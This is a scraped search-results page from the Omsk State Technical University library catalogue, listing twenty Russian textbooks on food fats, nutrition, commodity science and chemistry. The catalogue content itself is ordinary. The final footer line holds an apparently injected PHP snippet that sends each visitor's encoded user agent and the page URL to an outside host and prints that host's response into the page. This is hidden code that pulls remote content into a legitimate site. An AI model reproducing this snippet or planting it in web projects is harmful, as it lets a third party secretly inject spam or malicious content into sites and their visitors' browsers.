Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

128 пользователей


Зарегистрированных: 4 

Борисенко Виктория Александровна

Лисина Марина Михайловна

Асташков Владимир Анатольевич

Медведева Юлия Сергеевна


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ЖИРЫ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 73
1. 
Скрипко, Тамара Васильевна. Химия [Текст] : лаб. практикум / Т. В. Скрипко, О. Т. Тимошенко, 2012. - 254 с.
Ключевые слова 
Оглавление 
Держатели документа (Информация об экземплярах) 

Содержит рекомендации по проведению лабораторных опытов, демонстрационного эксперимента по важнейшим разделам общей, неорганической и органической химии.

К каждой работе приведены контрольные вопросы, которые помогут более глубоко разобраться в сущности эксперимента и связанных с ним теоретических положений. Справочный материал помещен в приложении.

Полный текст
2. 
Товароведение и экспертиза потребительских товаров [Текст] : Учебник для студентов торговых вузов / рук. авт. кол. В.В. Шевченко, 2003. - 544 с.
Ключевые слова 
товароведение -- экспертиза товаров -- ЗЕРНОМУЧНЫЕ ТОВАРЫ -- КОНДИТЕРСКИЕ ТОВАРЫ -- МОЛОЧНЫЕ ТОВАРЫ -- ПИЩЕВЫЕ ЖИРЫ -- МЯСНЫЕ ТОВАРЫ -- РЫБНЫЕ ТОВАРЫ -- ТОВАРОВЕДЕНИЕ -- КОНСЕРВИРОВАНИЕ -- ТАРА -- УПАКОВКА -- КРУПА -- МУКИ -- ХЛЕБ -- ХЛЕБОБУЛОЧНЫЕ ИЗДЕЛИЯ -- МАКАРОННЫЕ ИЗДЕЛИЯ -- ТОВАРОВЕДЕНИЕ ПЛОДОВ И ОВОЩЕЙ -- ГРИБЫ -- ЧАЙ -- КОФЕ -- НАПИТКИ БЕЗАЛКОГОЛЬНЫЕ -- НАПИТКИ АЛКОГОЛЬНЫЕ -- ТАБАЧНАЯ ПРОДУКЦИЯ -- ПРЯНОСТИ -- ПРИПРАВЫ -- МЕД -- ТОВАРОВЕДЕНИЕ КОНДИТЕРСКИХ ТОВАРОВ -- ТОВАРОВЕДЕНИЕ МОЛОЧНЫХ ТОВАРОВ -- СЫР -- МОРОЖЕНОЕ -- МАЙОНЕЗ -- МЯСНЫЕ КОНСЕРВЫ -- ПОЛУФАБРИКАТЫ -- ЯЙЦА -- ИКРА
Держатели документа (Информация об экземплярах) 
3. 
Экспертиза продовольственных товаров [Текст] : Лабораторный практикум: Учеб. пособие: Рекомендовано УМО для студентов, обуч. по специальностям 260504.65 "Технология консервов и птицеконцентратов", 260505.65 "Технология детского и функционального питания" и 260503.65 "Технология субтропических и пищевкусовых продуктов" / ред. Ю. И. Сидоренко, 2011. - 182 с.
Держатели документа (Информация об экземплярах) 
4. 
Идентификационная и товарная экспертиза продуктов белкового питания и пищевых жиров [Текст] : Уч.пособие гриф-УМО / ред. Т. Г. Родина, 2010. - 544 с.
Держатели документа (Информация об экземплярах) 
5. 
Основы микробиологии, физиологии питания и санитарии для общепита [Текст] : Учеб. пособие для студ. учеб. заведений сред. проф. образования / Авт. сост. Т. П. Трушина, 2000. - 382 с.
Ключевые слова 
БАКТЕРИЯ -- ГРИБЫ плесневые -- ДРОЖЖИ -- ВИРУС -- Фаги -- МИКРООРГАНИЗМ -- Брожение -- ФИЗИОЛОГИЯ питания -- МИКРОФЛОРА -- Пищеварение -- Белки -- Жиры -- Углеводы -- Витамины -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ -- Обмен веществ -- Режим питания -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- ПИТАНИЕ пожилых людей -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ПОДРОСТКОВ -- ПИТАНИЕ студентов -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ГИГИЕНА общественного питания -- ПРАВИЛА САНИТАРНЫЕ в общепите -- НАДЗОР санитарно-пищевой
6. 
Барановский В. А. Кондитер [Текст] : Учеб. пособие для уч-ся проф. лицеев и училищ / В. А. Барановский, Т. И. Перетятко, 2003. - 381 с.
Держатели документа (Информация об экземплярах) 
7. 
Тупикин Е. И. Общая биология с основами экологии и природоохранной деятельности [Текст] : Учеб. пособие для студ. нач. и сред. проф. образования / Е. И. Тупикин, 2004. - 378 с.
Ключевые слова 
ГЕНЕТИКА -- ВИРУС - БИОЛОГИЯ -- БАКТЕРИЯ -- КЛЕТКА -- ЭУКАРИОТЫ -- ТЕОРИЯ ЭВОЛЮЦИОННАЯ -- СЕЛЕКЦИЯ -- НАСЛЕДСТВЕННОСТЬ -- ПРОИСХОЖДЕНИЕ ЖИЗНИ -- Филогенез -- АНТРОПОГЕНЕЗ -- НИША ЭКОЛОГИЧЕСКАЯ -- ЭКОСИСТЕМА -- ОБМЕН ВЕЩЕСТВ -- ЖИРЫ -- ЛИПИДЫ -- УГЛЕВОДЫ -- АГРОЦЕНОЗ -- БЕЛОК -- ВИТАМИНЫ -- ФОТОСИНТЕЗ -- Диссимиляция -- БИОЦЕНОЗ -- ФАКТОР БИОТИЧЕСКИЙ -- ФАКТОР АБИОТИЧЕСКИЙ -- ФАКТОР АНТРОПОГЕННЫЙ -- БИОСИНТЕЗ -- КРУГОВОРОТ ВОДЫ В ПРИРОДЕ -- КРУГОВОРОТ УГЛЕРОДА -- Круговорот азота -- Круговорот фосфора -- ДНК -- ГОРМОН -- КИСЛОТА НУКЛЕИНОВАЯ -- ПДК -- РНК -- ЭКОЛОГИЯ ПРОМЫШЛЕННАЯ -- ЗАГРЯЗНЕНИЕ ОКРУЖАЮЩЕЙ СРЕДЫ -- ДЕЯТЕЛЬНОСТЬ ПРИРОДООХРАННАЯ -- АТМОСФЕРА - ЭКОЛОГИЯ -- ГИДРОСФЕРА - ЭКОЛОГИЯ -- ПОЧВА - ЭКОЛОГИЯ
Держатели документа (Информация об экземплярах) 
8. 
Покорн Д. Полная энциклопедия лечебного питания [Текст] : энциклопедия / Д. Покорн, 1998. - 574,[1] с.
Ключевые слова 
ПИТАНИЕ ЛЕЧЕБНОЕ -- Гигиена питания -- ПИТАНИЕ ЗДОРОВОЕ -- Питание - здоровье -- Питание сбалансированное -- БЕЛКИ - питание -- СОСТАВ ХИМИЧЕСКИЙ ПРОДУКТОВ -- САХАР - питание -- ЖИРЫ - питание -- ВИТАМИНЫ -- Натрий - питание -- Калий - питание -- Кальций - питание -- Магний - питание -- Фосфор - питание -- Микроэлементы - питание -- Йод - питание -- Фтор - питание -- Железо - питание -- Цинк - питание -- Селен - питание -- Медь - питание -- Хром - питание -- Клетчатка - питание -- ВОДА - питание -- Диета геропрофилактическая -- Диета молочная -- Диета рыбная -- Вегетаринство -- Питание макробиотическое -- Гастрономия -- Питание женщин беременных -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ УЧАЩИХСЯ -- Питание спортсменов -- ПИТАНИЕ ПОЖИЛЫХ ЛЮДЕЙ -- Питание диетотерапевтическое -- ДИЕТА ЛЕЧЕБНАЯ -- КОРМЛЕНИЕ -- ОБМЕН ВЕЩЕСТВ - нарушения -- Диабет сахарный -- Гипогликемия -- Остеопороз -- Диета для похудения -- Анемия -- Аллергия пищевая -- Авитаминоз -- Ожирение -- ПОСТ православный -- Сбор лекарственный -- РАСТЕНИЯ ЦЕЛЕБНЫЕ
Держатели документа (Информация об экземплярах) 
9. 
Барановский В. А. Рецептурный справочник повара [Текст] : справочное издание / В. А. Барановский, 2003. - 379 с.
Ключевые слова 
ОБРАБОТКА ПРОДУКТОВ -- БЕЛКИ -- ЖИРЫ -- УГЛЕВОДЫ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ дичи -- БЛЮДА ИЗ кролика -- СОУС -- БЛЮДА СЛАДКИЕ -- ТЕСТО -- ФАРШ
Держатели документа (Информация об экземплярах) 
10. 
Денисова, Светлана Александровна. Пищевые жиры [Текст] : Справочники/словари / С. А. Денисова, Т. В. Пилипенко, 1998. - 79 с.
Держатели документа (Информация об экземплярах) 
11. 
Касторных, Мария Семеновна. Товароведение и экспертиза пищевых жиров, молока и молочных продуктов [Текст] : Учебник гриф-УМО / М. С. Касторных, В. А. Кузьмина, Ю. С. Пучкова, 2009. - 328 с.
Держатели документа (Информация об экземплярах) 
12. 
Завистовска, Зофья. Диетическое питание при различных заболеваниях [Текст] / З. Завистовска, 1992. - 221, [1] с.
Ключевые слова 
ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ГИГИЕНА ПИТАНИЯ -- ПИТАНИЕ ЗДОРОВОЕ -- БЕЛКИ - ПИТАНИЕ -- УГЛЕВОДЫ - ПИТАНИЕ -- САХАРИДЫ - ПИТАНИЕ -- ЖИРЫ - ПИТАНИЕ -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ - ПИТАНИЕ -- ВОДА - ПИТАНИЕ -- ВИТАМИНЫ- ПИТАНИЕ -- МЕНЮ ДИЕТИЧЕСКОЕ -- ДИЕТА ЛЕЧЕБНАЯ -- ДИЕТА ЛЕГКОУСВОЯЕМАЯ -- БОЛЕЗНЬ ЖЕЛУДКА - ПИТАНИЕ -- БОЛЕЗНЬ КИШЕЧНИКА - ПИТАНИЕ -- БОЛЕЗНЬ ПЕЧЕНИ - ПИТАНИЕ -- ДИАБЕТ САХАРНЫЙ - ПИТАНИЕ -- ОЖИРЕНИЕ - ПИТАНИЕ -- БОЛЕЗНЬ СЕРДЦА - ПИТАНИЕ -- БОЛЕЗНЬ ПОЧЕК - ПИТАНИЕ -- ТЕМПЕРАТУРА ВЫСОКАЯ - ПИТАНИЕ -- ПИТАНИЕ ЖЕНЩИН БЕРЕМЕННЫХ -- ПИТАНИЕ КОРМЯЩИХ МАТЕРЕЙ -- СУПЫ - ПИТАНИЕ ЛЕЧЕБНОЕ -- ОВОЩИ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА МУЧНЫЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА ИЗ КРУП - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА ИЗ ЯИЦ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА МЯСНЫЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА РЫБНЫЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- СОУС - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА СЛАДКИЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ ДИЕТИЧЕСКИЕ -- НАПИТКИ - ПИТАНИЕ ЛЕЧЕБНОЕ
13. 
Бренц, Мелита Яновна. Жиры и их использование в питании [Текст] / М. Я. Бренц, 1973. - 64, [1] с.
Держатели документа (Информация об экземплярах) 
14. 
Бирюкова, Вера Васильевна. Товароведение продовольственных товаров [Текст] : конспект лекций / В. В. Бирюкова, Н. В. Шевченко, 2008. - 32 с.
Ключевые слова 
Оглавление 
  • Введение. - с.3
  • Основы товароведения продовольственных товаров. - с.3
  • Состояние и перспективы развития рынка продовольственных товаров. - с.3
  • Химический состав продовольственных товаров. - с.3
  • Общие сведения о продовольственных товарах. - с.3
  • Особенности оценки качества продовольственных товаров. - с.7
  • Качество пищевых продуктов. - с.7
  • Управление качеством продовольственных товаров при хранении и реализации. - с.9
  • Основы хранения продовольственных товаров. - с.9
  • Кодирование продовольственных товаров. - с.10
  • Сертификация продовольственных товаров. - с.11
  • Сертификация товаров. - с.11
  • Экспертиза товаров. - с.12
  • Товароведная характеристика продовольственных товаров однородных групп. - с.13
  • Зерномучные товары. - с.13
  • Плодоовощные товары. - с.14
  • Вкусовые товары. - с.15
  • Кондитерские товары. - с.17
  • Пищевые жиры. - с.19
  • Молочные товары. - с.22
  • Яичные товары. - с.24
  • Мясные товары. - с.25
  • Рыбные товары. - с.28
  • Библиографический список. - с.31
Держатели документа (Информация об экземплярах) 

Рассмотрены основные вопросы о продовольственных товарах, <качества> <пищевых> <продуктов>, групп продуктов, <кодирование> продовольственных товаров, <сертификация>, <экспертиза> товаров.

Полный текст
15. 
Петровский, Константин Семенович. Гигиена питания [Текст] : учеб. для санитар.-гигиен. фак. мед. ин-тов / К. С. Петровский, 1975. - 399, [1] с.
Держатели документа (Информация об экземплярах) 
16. 
Бирюкова, Вера Васильевна. Санитария и гигиена [Текст] : учеб. пособие / В. В. Бирюкова, Н. В. Шевченко, 2011. - 76 с.
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст
17. 
Товароведение и экспертиза потребительских товаров [Текст] : Учебник гриф-МО / рук. работы В. В. Шевченко, 2006. - 544 с.
Держатели документа (Информация об экземплярах) 
18. 
Глинка, Николай Леонидович. Общая химия [Электронный ресурс] : учеб. для нехим. специальностей вузов / Н. Л. Глинка ; под ред. В. А. Попкова, В. А., А. В. Бабкова, 2011. - 1 o=эл. опт. диск (CD-ROM)
Оглавление 
Держатели документа (Информация об экземплярах) 

Изложены теоретические и практические основы курса общей химии. Большое внимание уделено строению атомов и молекул, закономерностям протекания химических реакций. В настоящем переработанном и дополненном издании выделены в самостоятельные главы органические соединения и дисперсные системы, расширен материал по биохимии и проблемам взаимодействия человека с окружающей средой.

Легендарный учебник, переведенный на многие языки стран Европы, Азии, Африки и выпущенный общим тиражом свыше 5 миллионов экземпляров, в новой редакции.

Содержание учебника соответствует государственному стандарту высшего профессионального образования и методическим требованиям, предъявляемым к учебным изданиям.

19. 
Холодильная технология пищевых продуктов [Текст] : учеб. для вузов по специальности 260504 (270800) "Технология консервов и пищеконцентратов" направления подгот. дипломир. специалиста 260500 (655700) "Технология продовольственных продуктов социального назначения и общественного питания" и магист. программе 260100.68 (552418) "Холодильная технология пищевых продуктов": в 3 ч. Ч. 2 : Технологические основы / В. И. Филиппов [и др.], 2008. - 571, [1] с.
Держатели документа (Информация об экземплярах) 

Во второй части учебника "Холодильная технология пищевых продуктов" рассматриваются технологические аспекты процессов холодильного консервирования пищевых продуктов. Изложены состав и свойства пищевых продуктов, значение микроорганизмов при холодильном консервировании, технологические режимы холодильной обработки, отепления, размораживания, условия хранения и транспортирования различных видов сырья и продуктов их переработки. Приведены технические средства, применяемые в современной холодильной технологии пищевых продуктов.

20. 
Тимофеева, Валентина Афанасьевна. Товароведение продовольственных товаров [Текст] : Учеб. пособие для образоват. учреждений сред. и проф. образования по специальности 0612 "Товароведение" / В. А. Тимофеева, 2002. - 447 с.
Ключевые слова 
ПРОДОВОЛЬСТВЕННЫЕ ТОВАРЫ -- КОНДИТЕРСКИЕ ТОВАРЫ -- МОЛОЧНЫЕ ТОВАРЫ -- ПИЩЕВЫЕ ЖИРЫ -- МЯСНЫЕ ПРОДУКТЫ -- ЯИЧНЫЕ ТОВАРЫ -- РЫБНЫЕ ТОВАРЫ -- ВКУСОВЫЕ ТОВАРЫ -- ПЛОДООВОЩЫЕ ТОВАРЫ -- ЗЕРНО -- ПИЩЕВЫЕ КОНЦЕНТРАТЫ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК чайный -- ПРЯНОСТИ -- ТАБАК -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- Крахмал -- Сахар -- Мед -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- МОЛОКО -- Мороженое -- СЫР -- ЖИР пищевой -- Масло растительное -- Маргарин -- Жир кулинарный -- МЯСО -- ЯЙЦЕПРОДУКТЫ -- Концентрат пищевой -- РЫБА

В книге рассматриваются основные вопросы товароведения продовольственных товаров в современных условиях; приведены необходимые <продавцу> и <товароведу> сведения по всем группам <товаров>, а также по вопросам <стандартизации> и <сертификации>, информационному обеспечению, которые позволят работникам торговли принимать квалифицированные решения в <коммерческой деятельности>.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3021 - 17.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.36 с.12 запросов, 0.68c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;